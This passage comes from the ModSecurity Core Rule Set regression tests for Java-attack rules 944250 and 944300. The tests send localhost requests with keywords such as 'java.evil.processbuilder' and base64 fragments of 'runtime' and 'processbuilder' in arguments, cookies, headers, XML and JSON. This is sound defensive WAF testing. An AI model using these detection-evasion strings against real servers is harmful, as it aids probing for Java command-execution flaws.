"127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-18 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-19 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-20 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.evil.processbuilder\"}" output: log_contains: "id \"944250\"" - test_title: 944250-21 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.evil.processbuilder\": \"test\"}" output: log_contains: "id \"944250\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml��������0000664�0000000�0000000�00001040352�14461225151�0027672�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944300.yaml" description: "Positive tests for rule 944300" tests: - test_title: 944300-0 desc: "Argument test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-1 desc: "Argument name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-2 desc: "Cookie test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cnVudGltZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-3 desc: "Cookie name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cnVudGltZQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-4 desc: "Request header test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cnVudGltZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-5 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-6 desc: "XML element value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-7 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-8 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-9 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cnVudGltZQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-10 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cnVudGltZQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-11 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-12 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU=test" output: log_contains: "id \"944300\"" - test_title: 944300-13 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HJ1bnRpbWU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-14 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HJ1bnRpbWU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-15 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HJ1bnRpbWU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-16 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-17 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-18 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-19 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-20 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HJ1bnRpbWU\"}" output: log_contains: "id \"944300\"" - test_title: 944300-21 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HJ1bnRpbWU\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-22 desc: "Argument test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-23 desc: "Argument name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l=test" output: log_contains: "id \"944300\"" - test_title: 944300-24 desc: "Cookie test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BydW50aW1l method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-25 desc: "Cookie name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BydW50aW1l=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-26 desc: "Request header test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BydW50aW1l method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-27 desc: "XML attribute value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-28 desc: "XML element value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-29 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-30 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-31 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BydW50aW1l\"}" output: log_contains: "id \"944300\"" - test_title: 944300-32 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BydW50aW1l\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-33 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-34 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-35 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cHJvY2Vzc2J1aWxkZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-36 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cHJvY2Vzc2J1aWxkZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-37 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cHJvY2Vzc2J1aWxkZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-38 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-39 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-40 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-41 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-42 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-43 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: 